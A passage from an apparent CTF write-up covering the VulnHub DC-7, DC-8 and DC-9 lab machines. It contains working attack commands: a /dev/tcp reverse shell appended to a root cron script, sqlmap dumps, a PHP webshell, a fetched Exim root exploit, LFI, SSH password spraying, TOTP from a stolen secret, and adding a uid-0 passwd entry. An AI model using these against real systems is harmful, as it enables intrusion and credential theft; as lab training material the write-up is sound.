X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]

From root@dc-7 Fri Aug 30 03:15:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3O0y-0000Ed-To
for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3O0y-0000Ed-To@dc-7>
Date: Fri, 30 Aug 2019 03:15:17 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]

The headers show these are root's cron job output, running /opt/scripts/backups.sh:

```
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
```

The script is owned by www-data, though, so a shell as the web server user is needed before it can be modified.

MySQL

The credentials found so far do not open the database.

/var/www/html/sites/default/settings.php holds the real database credentials:

```
$databases['default']['default'] = array (
  'database' => 'd7db',
  'username' => 'db7user',
  'password' => 'yNv3Po00',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '',
  'namespace' => 'Drupal\\Core\\Database\\Driver\\mysql',
  'driver' => 'mysql',
);
```

```
mysql -u db7user -p'yNv3Po00' d7db
```

users_field_data contains:

| uid | username | password hash | email | status |
|---|---|---|---|---|
| 0 | (empty) | NULL | NULL | 0 (disabled) |
| 1 | admin | $S$Ead.KmIcT/yfKC.1H53aDPJasaD7o.ioEGiaPy1lLyXXAJC/Qi4F | admin@example.com | 1 (enabled) |
| 2 | dc7user | $S$EKe0kuKQvFhgFnEYMpq.mRtbl/TQ5FmEjCDxbu0HIHaO0/U.YFjI | dc7user@blah.com | 1 (enabled) |

Resetting the password

The same approach as on DC1 (https://drupalchina.cn/node/2128): Drupal ships /core/scripts/password-hash.sh to generate a hash for a given password.

```
php scripts/password-hash.sh 123456
password: 123456 hash: $S$E.1j8lHEsC.DgYLxRfdhEplIJJYkauPJvEPJI/t1b03NiiUFEoNY
```

```
UPDATE users_field_data SET pass = '$S$E.1j8lHEsC.DgYLxRfdhEplIJJYkauPJvEPJI/t1b03NiiUFEoNY' WHERE uid = 1;
```

The admin login still failed and I could not tell why at the time. A likely cause is Drupal 8's entity cache: user entities are cached in the cache_entity table, so a row changed directly in SQL is not seen until the cache is cleared (drush cr, or truncating the cache_* tables).

After reading a writeup I found another way to change the password: drush, Drupal's command-line tool, which goes through the API and invalidates the cache itself:

```
drush upwd admin --password="password"
```

Logging in to the admin panel now works.

Writing a shell through a page

Content => Add content => Basic page can carry a shell.

The PHP filter module has to be installed first (Extend => Install new module):

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

Write the shell into the page body with the PHP code text format.

This gives a shell as www-data.

Privilege escalation via the cron job

backups.sh is owned by www-data, so append a reverse shell to it:

```
echo 'bash -i >& /dev/tcp/192.168.1.17/6666 0>&1' >> /opt/scripts/backups.sh
```

Wait for the next run (the mail timestamps show it fires every 15 minutes) and the shell comes back as root.

image-20260223213022123

The flag:

```
888       888          888 888      8888888b.                             888 888 888 888 
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888


Congratulations!!!

Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.
```

DC8

vulnhub dc8

https://www.vulnhub.com/entry/dc-8,367/

Target IP

```
192.168.1.13
```

Information gathering

```
nmap -p- --min-rate 10000 192.168.1.13 -oN nmap/port.txt
```

```
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

```
nmap -sT -sC -sV -O -p22,80 192.168.1.13 -oN nmap/detail.txt
```

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Welcome to DC-8 | DC-8
|_http-server-header: Apache
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
MAC Address: 08:00:27:8C:51:C4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

  • Open ports
    • 22/tcp: SSH (OpenSSH 7.4p1)
    • 80/tcp: HTTP (Apache, running Drupal 7)
  • CMS: Drupal 7
  • OS: Linux 3.2 - 4.14
```
dirsearch -u http://192.168.1.13 -i 200,301
```

```
[07:01:14] 200 -   33KB - /CHANGELOG.txt
[07:01:16] 200 -  769B  - /COPYRIGHT.txt
[07:01:29] 301 -  237B  - /includes -> http://192.168.1.13/includes/
[07:01:31] 200 -  868B  - /INSTALL.mysql.txt
[07:01:31] 200 -    1KB - /install.php
[07:01:31] 200 -  842B  - /INSTALL.pgsql.txt
[07:01:31] 200 -    1KB - /install.php?profile=default
[07:01:32] 200 -    6KB - /INSTALL.txt
[07:01:35] 200 -    7KB - /LICENSE.txt
[07:01:38] 200 -    2KB - /MAINTAINERS.txt
[07:01:40] 301 -  233B  - /misc -> http://192.168.1.13/misc/
[07:01:41] 301 -  236B  - /modules -> http://192.168.1.13/modules/
[07:01:44] 200 -    2KB - /node
[07:01:52] 301 -  237B  - /profiles -> http://192.168.1.13/profiles/
[07:01:53] 200 -    2KB - /README.txt
[07:01:55] 200 -  744B  - /robots.txt
[07:01:56] 301 -  236B  - /scripts -> http://192.168.1.13/scripts/
[07:01:59] 301 -  234B  - /sites -> http://192.168.1.13/sites/
[07:01:59] 200 -  129B  - /sites/all/libraries/README.txt
[07:01:59] 200 -    0B  - /sites/example.sites.php
[07:01:59] 200 -  545B  - /sites/all/themes/README.txt
[07:01:59] 200 -  715B  - /sites/all/modules/README.txt
[07:01:59] 200 -  431B  - /sites/README.txt
[07:02:05] 301 -  235B  - /themes -> http://192.168.1.13/themes/
[07:02:08] 200 -    3KB - /UPGRADE.txt
[07:02:09] 200 -    2KB - /user
[07:02:09] 200 -    2KB - /user/
[07:02:09] 200 -    2KB - /user/login/
[07:02:11] 200 -  177B  - /views/ajax/autocomplete/user/a
[07:02:13] 200 -    2KB - /web.config
[07:02:16] 200 -   42B  - /xmlrpc.php
```

Going through the directories one by one turned up nothing useful.

SQL injection

The Details menu on the home page passes a nid parameter that turns out to be injectable:

```
http://192.168.1.13/?nid=1
```

```
sqlmap -u "http://192.168.1.13/?nid=1" -p nid --dbs --batch --random-agent

[*] d7db
[*] information_schema
```
```
sqlmap -u "http://192.168.1.13/?nid=1" -p nid --batch --random-agent -D d7db --tables

| block |
| cache |
| filter |
| history |
| role |
| system |
| actions |
| authmap |
| batch |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter_format |
| flood |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| site_messages_table |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
| webform |
| webform_component |
| webform_conditional |
| webform_conditional_actions |
| webform_conditional_rules |
| webform_emails |
| webform_last_download |
| webform_roles |
| webform_submissions |
| webform_submitted_data |
```
```
sqlmap -u "http://192.168.1.13/?nid=1" -p nid --batch --random-agent -D d7db -T users --dump
```

| username | email | password hash (Drupal 7 $S$) |
|---|---|---|
| admin | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | john@blahsdfsfd.org | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |

Cracking

```
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```

Only john's hash falls to rockyou:

```
john:turtle
```

These credentials log in to the admin panel.
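Both the DC7 password reset above and this crack step hinge on Drupal's $S$ password hash (phpass-style, SHA-512, 2^N chained rounds, custom base64, truncated to 55 characters). The following is an added Python reimplementation, not code from the write-up and not Drupal's own; it produces a hash for an UPDATE on users / users_field_data and checks a candidate password against a dumped hash without PHP or drush. The john:turtle hash is the one dumped from DC8 above; the 123456 salt is taken from the DC7 password-hash.sh output.

```python
"""Drupal 7/8 "$S$" password hashing in pure Python (added example, not Drupal's code)."""
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH: stored hashes are cut to this many characters
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT
SALT_LEN = 8


def drupal_b64(data: bytes) -> str:
    """Drupal's phpass-style base64: its own alphabet, little-endian bit packing, no padding."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str) -> Tuple[int, str]:
    """(count_log2, salt) from the 12-character setting prefix; '$S$' + count char + 8-char salt."""
    setting = stored[:12]
    if len(setting) != 12 or not setting.startswith("$S$"):
        raise ValueError("not a Drupal $S$ (SHA-512) hash")
    count_log2 = ITOA64.find(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError("iteration count out of range")
    return count_log2, setting[4:12]


def drupal_crypt(password: str, setting: str) -> str:
    """Drupal's _password_crypt('sha512'): sha512(salt+pw), then 2**count_log2 rounds of sha512(h+pw)."""
    if len(password) > 512:            # Drupal refuses very long passwords (hashing DoS guard)
        raise ValueError("password too long")
    count_log2, salt = parse_setting(setting)
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + drupal_b64(digest))[:HASH_LENGTH]


def hash_password(password: str, count_log2: int = 16, salt: Optional[str] = None) -> str:
    """Fresh hash. Drupal 7 defaults to count_log2 15 ('$S$D...'), Drupal 8 to 16 ('$S$E...')."""
    if salt is None:
        salt = "".join(secrets.choice(ITOA64) for _ in range(SALT_LEN))
    if len(salt) != SALT_LEN:
        raise ValueError("salt must be 8 characters")
    return drupal_crypt(password, "$S$" + ITOA64[count_log2] + salt)


def check_password(password: str, stored: str) -> bool:
    """user_check_password(): recompute with the stored setting and compare in constant time."""
    try:
        return hmac.compare_digest(drupal_crypt(password, stored), stored)
    except ValueError:
        return False


if __name__ == "__main__":
    JOHN = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"   # from the DC8 dump above
    print("john:turtle ->", check_password("turtle", JOHN))
    print("UPDATE users_field_data SET pass = '%s' WHERE uid = 1;" % hash_password("password"))
```

For cracking, the cost is the point: 2^15 or 2^16 SHA-512 calls per guess is why a wordlist run is the only realistic option and why the DC7 author's "brute force won't work" hint is believable. For the DC7 reset, a hash generated this way is byte-for-byte what password-hash.sh would emit for the same salt, so if the UPDATE route still fails the problem is elsewhere (cache, wrong table), not the hash.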

Getting a shell through a form

Once logged in, Contact Us -> Webform -> Form settings lets the confirmation message be written with the PHP code text format, so PHP can be placed there.

Submitting the Contact Us form then renders the confirmation page, which runs the injected code.

image-20260224210344946

Reverse shell from the same payload:

image-20260224211357096

Privilege escalation via exim

The SUID search shows exim4. Check the version:

```
/usr/sbin/exim4 -bV

Exim version 4.89 #2 built 14-Jun-2017 05:03:07
```

```
searchsploit exim | grep "Privilege"
```

Exploit-DB 46996 (the local privilege escalation for Exim 4.87 to 4.91, CVE-2019-10149) matches this version. Serve it from Kali, fetch it on the target and run it with the netcat method:

```
wget http://192.168.1.17:8080/46996.sh
chmod +x 46996.sh
./46996.sh -m netcat
```

image-20260224220345897

The flag:

```
Brilliant - you have succeeded!!!

888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888

Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.
```

2FA

The author mentions 2FA (two-factor authentication) in the challenge notes.

In short, logging in requires the password plus a verification code generated from a secret key, changing over time.

With root already obtained, the 2FA setup can be inspected:

  • /var/log/auth.log records every authentication-related event.

  • ~/.google_authenticator stores the secret seed used when the user enabled Google Authenticator.

/var/log/auth.log shows that dc8user has 2FA configured.

dc8user's home directory holds .google_authenticator:

```
NRJWQLHCQYKWD27G2GW4XFBR7Q   <-- 1. secret key (base32)
" WINDOW_SIZE 17              <-- 2. window size (allowed time drift, in codes)
" TOTP_AUTH                   <-- 3. authentication type (time-based one-time password)
27017752                      <-- 4. scratch code 1
93723285                      <-- 5. scratch code 2
97959003                      <-- 6. scratch code 3
36240515                      <-- 7. scratch code 4
```

Generate a code from the secret:

```
oathtool --totp -b NRJWQLHCQYKWD27G2GW4XFBR7Q
```

From Kali you can then log in as dc8user without the password by entering the verification code.

Two things to check if the code is rejected: the clocks on Kali and the target must agree to within the window (17 codes is the current one plus 8 on either side, so about 4 minutes), and the four scratch codes each work exactly once, being deleted from the file after use.

image-20260224222927803
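What oathtool does with that secret is RFC 6238 TOTP: base32-decode the key, HMAC-SHA1 it over the current 30-second step counter, and dynamically truncate to six digits. The following is an added Python example, not code from the write-up or from oathtool or the PAM module: it parses the .google_authenticator layout shown above (secret, option lines beginning with `" `, then single-use scratch codes), derives the current code, and verifies a submitted code the way the module would, honouring WINDOW_SIZE and burning a scratch code once used. The embedded file content is copied from the dump above.

```python
"""TOTP (RFC 6238) from a .google_authenticator file (added example)."""
import base64
import hashlib
import hmac
import struct
import time
from typing import Dict, List, Optional

STEP = 30  # seconds per TOTP step

# Content of dc8user's .google_authenticator as dumped in the write-up above
GA_FILE = """\
NRJWQLHCQYKWD27G2GW4XFBR7Q
" WINDOW_SIZE 17
" TOTP_AUTH
27017752
93723285
97959003
36240515
"""


def parse_google_authenticator(text: str) -> Dict[str, object]:
    """First line is the secret; '" KEY [VALUE]' lines are options; bare digits are scratch codes."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    options: Dict[str, Optional[str]] = {}
    scratch: List[str] = []
    for ln in lines[1:]:
        if ln.startswith('" '):
            parts = ln[2:].split(None, 1)
            options[parts[0]] = parts[1] if len(parts) > 1 else None
        elif ln.isdigit():
            scratch.append(ln)
    return {"secret": lines[0], "options": options, "scratch": scratch}


def decode_secret(secret: str) -> bytes:
    """Base32-decode, restoring the '=' padding that google-authenticator leaves out."""
    secret = secret.strip().upper()
    return base64.b32decode(secret + "=" * (-len(secret) % 8))


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the big-endian counter, dynamic truncation, modulo 10**digits."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(key: bytes, at: Optional[float] = None) -> str:
    """RFC 6238: HOTP with counter = floor(unix_time / 30)."""
    t = time.time() if at is None else at
    return hotp(key, int(t) // STEP)


def verify(code: str, state: Dict[str, object], at: Optional[float] = None) -> bool:
    """Accept a scratch code once, or a TOTP within the configured window around the current step."""
    scratch = state["scratch"]
    if code in scratch:
        scratch.remove(code)          # single use: the PAM module rewrites the file without it
        return True
    size = int(state["options"].get("WINDOW_SIZE") or 3)   # 3 = previous, current, next
    half = (size - 1) // 2
    key = decode_secret(state["secret"])
    now = int(time.time() if at is None else at) // STEP
    return any(hmac.compare_digest(hotp(key, now + d), code) for d in range(-half, half + 1))


if __name__ == "__main__":
    state = parse_google_authenticator(GA_FILE)
    print("current code:", totp(decode_secret(state["secret"])))   # same as oathtool --totp -b
    print("scratch codes left:", len(state["scratch"]))
```

The window is what makes clock drift survivable and also what an attacker with the secret enjoys: with WINDOW_SIZE 17 any of 17 consecutive codes is valid, so the secret file, not the six digits, is the thing to protect (and to hunt for once you have a shell).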

DC9

vulnhub dc9

https://www.vulnhub.com/entry/dc-9,412/

Target IP

```
192.168.1.12
```

Information gathering

```
nmap -p- --min-rate 10000 192.168.1.12 -oN nmap/port.txt
```

```
PORT   STATE    SERVICE
22/tcp filtered ssh
80/tcp open     http
```

```
nmap -sT -sC -sV -O -p22,80 192.168.1.12 -oN nmap/detail.txt
```

```
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 08:00:27:75:01:28 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 4.0 - 4.4 (92%), Linux 4.4 (92%), Linux 5.1 - 5.15 (91%), Linux 3.2 - 4.14 (89%), Linux 2.6.32 - 3.13 (89%), Linux 5.0 - 5.14 (89%), Linux 2.6.32 (88%), OpenWrt 19.07 (Linux 4.14) (88%), Linux 3.11 - 4.9 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
```

  • Web server: Apache/2.4.38
  • OS: Debian, Linux 3.10 - 4.11 (guess)
  • Page title: "Example.com - Staff Details - Welcome"
  • Ports: only 80 open; 22 shows as filtered in one scan and closed in the other, which means the service is there but gated (port knocking, as covered at the end of this write-up)
```
dirsearch -u http://192.168.1.12 -i 200,301,302
```

```
[04:55:30] 200 -    0B  - /config.php
[04:55:31] 301 -  310B  - /css -> http://192.168.1.12/css/
[04:55:32] 200 - 1001B  - /display.php
[04:55:35] 301 -  315B  - /includes -> http://192.168.1.12/includes/
[04:55:35] 200 -  406B  - /includes/
[04:55:38] 302 -    0B  - /logout.php -> manage.php
[04:55:38] 200 -  548B  - /manage.php
[04:55:46] 200 -  485B  - /search.php
```
```
whatweb -v http://192.168.1.12
```

```
WhatWeb report for http://192.168.1.12
Status    : 200 OK
Title     : Example.com - Staff Details - Welcome
IP        : 192.168.1.12
Country   : RESERVED, ZZ

Summary   : Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.38 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Debian Linux
        String       : Apache/2.4.38 (Debian) (from server string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Wed, 25 Feb 2026 09:58:35 GMT
        Server: Apache/2.4.38 (Debian)
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 402
        Connection: close
        Content-Type: text/html; charset=UTF-8
```

SQL injection

search.php is injectable. The POST request was saved from Burp to 1.txt and handed to sqlmap:

```
sqlmap -r 1.txt --batch --dbs --level 3 --risk 3

[*] information_schema
[*] Staff
[*] users
```

```
sqlmap -r 1.txt --batch --level 3 --risk 3 -D users --tables

UserDetails
```

```
sqlmap -r 1.txt --batch --level 3 --risk 3 -D users -T UserDetails --dump
```
| ID | Lastname | Password | Reg date | Username | Firstname |
|---|---|---|---|---|---|
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |

The passwords are stored in plaintext.

The same way, the two tables of the Staff database:

StaffDetails

| ID | Email | Phone | Lastname | Reg date | Firstname | Position |
|---|---|---|---|---|---|---|
| 1 | marym@example.com | 46478415155456 | Moe | 2019-05-01 17:32:00 | Mary | CEO |
| 2 | julied@example.com | 46457131654 | Dooley | 2019-05-01 17:32:00 | Julie | Human Resources |
| 3 | fredf@example.com | 46415323 | Flintstone | 2019-05-01 17:32:00 | Fred | Systems Administrator |
| 4 | barneyr@example.com | 324643564 | Rubble | 2019-05-01 17:32:00 | Barney | Help Desk |
| 5 | tomc@example.com | 802438797 | Cat | 2019-05-01 17:32:00 | Tom | Driver |
| 6 | jerrym@example.com | 24342654756 | Mouse | 2019-05-01 17:32:00 | Jerry | Warehousing |
| 7 | wilmaf@example.com | 243457487 | Flintstone | 2019-05-01 17:32:00 | Wilma | Accountant |
| 8 | bettyr@example.com | 90239724378 | Rubble | 2019-05-01 17:32:00 | Betty | Junior Accountant |
| 9 | chandlerb@example.com | 189024789 | Bing | 2019-05-01 17:32:00 | Chandler | President of Sales |
| 10 | joeyt@example.com | 232131654 | Tribbiani | 2019-05-01 17:32:00 | Joey | Janitor |
| 11 | rachelg@example.com | 823897243978 | Green | 2019-05-01 17:32:00 | Rachel | Personal Assistant |
| 12 | rossg@example.com | 6549638203 | Geller | 2019-05-01 17:32:00 | Ross | Instructor |
| 13 | monicag@example.com | 8092432798 | Geller | 2019-05-01 17:32:00 | Monica | Marketing |
| 14 | phoebeb@example.com | 43289079824 | Buffay | 2019-05-01 17:32:02 | Phoebe | Assistant Janitor |
| 15 | scoots@example.com | 454786464 | McScoots | 2019-05-01 20:16:33 | Scooter | Resident Cat |
| 16 | janitor@example.com | 65464646479741 | Trump | 2019-12-23 03:11:39 | Donald | Replacement Janitor |
| 17 | janitor2@example.com | 47836546413 | Morrison | 2019-12-24 03:41:04 | Scott | Assistant Replacement Janitor |

Users

| UserID | Password | Username |
|---|---|---|
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |

None of the credentials from the first two tables work on the login form.

Cracking admin's hash (an unsalted MD5) gives:

```
admin:transorbital1
```

This logs in successfully.

image-20260225192733796

LFI

The page footer shows "File does not exist", which hints at a file inclusion:

```
http://192.168.1.12/manage.php?file=../../../../etc/passwd
```

This returns /etc/passwd.

image-20260225195444226

Password spraying

Take the usernames from /etc/passwd that have a login shell, combine them with the passwords dumped from UserDetails, and spray SSH. The earlier scan showed port 22 as not open, but it is still worth a try.

```
hydra -L name.txt -P pass.txt 192.168.1.12 ssh
```

Three valid pairs:

```
chandlerb:UrAG0D!
joeyt:Passw0rd
janitor:Ilovepeepee
```

Logging in as each in turn, janitor's home directory contains a hidden directory with a list of passwords:

```
/home/janitor/.secrets-for-putin/passwords-found-on-post-it-notes.txt
```

```
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
```

再次进行喷洒

得到另一组凭据

1
fredf:B4-Tru3-001

After logging in over SSH, sudo -l shows that fredf has a sudo rule:

(root) NOPASSWD: /opt/devstuff/dist/test/test

Running the binary prints a usage message that names test.py.

image-20260225202142767

test.py lives in /opt/devstuff/:

#!/usr/bin/python

import sys

# Expects exactly two arguments: a file to read and a file to append to
# (sys.argv also holds the script name, hence the check for 3)
if len(sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    # open the first argument read-only and read all of it
    f = open(sys.argv[1], "r")
    output = (f.read())

    # open the second argument in append mode and write the contents to its end
    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

It reads any file and appends its contents to any other file, and the sudo rule runs it as root, so we can append a new uid-0 user to /etc/passwd. (The same primitive is also an arbitrary file read as root: the first argument can be /etc/shadow and the second a file in our own home directory.)

sudo privilege escalation

Generate a password hash (without an algorithm flag, openssl passwd produced an MD5-crypt $1$ hash here, which Debian's login stack accepts):

openssl passwd 123456
$1$pQ66hyxc$rTHGWGC/aQ0uW9JoEFtcY1

Write the passwd entry to a file. uid 0 and gid 0 make the account root, and because the password field holds the hash itself rather than x, /etc/shadow is never consulted:

echo 'hacker:$1$pQ66hyxc$rTHGWGC/aQ0uW9JoEFtcY1:0:0::/root:/bin/bash' >/home/fredf/1.txt

Append it to passwd (the second argument is the file written as root):

sudo /opt/devstuff/dist/test/test /home/fredf/1.txt /etc/passwd

Switch to the new user with the password 123456:

su hacker

image-20260225203021927
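The chain above (the append-as-root primitive in test.py plus the crafted passwd line) is worth exercising on a scratch copy before touching the real /etc/passwd, because a malformed entry breaks logins for everyone. This is an added example, not code from the writeup or from the box: it validates the entry (crypt-style hash, no stray colons), reproduces test.py's read-then-append behaviour against temporary files, and adds the check a defender runs afterwards, listing every uid-0 account in passwd. The hash is the one the page generated with `openssl passwd`; the scratch passwd content is constructed.

```python
import os
import re
import tempfile

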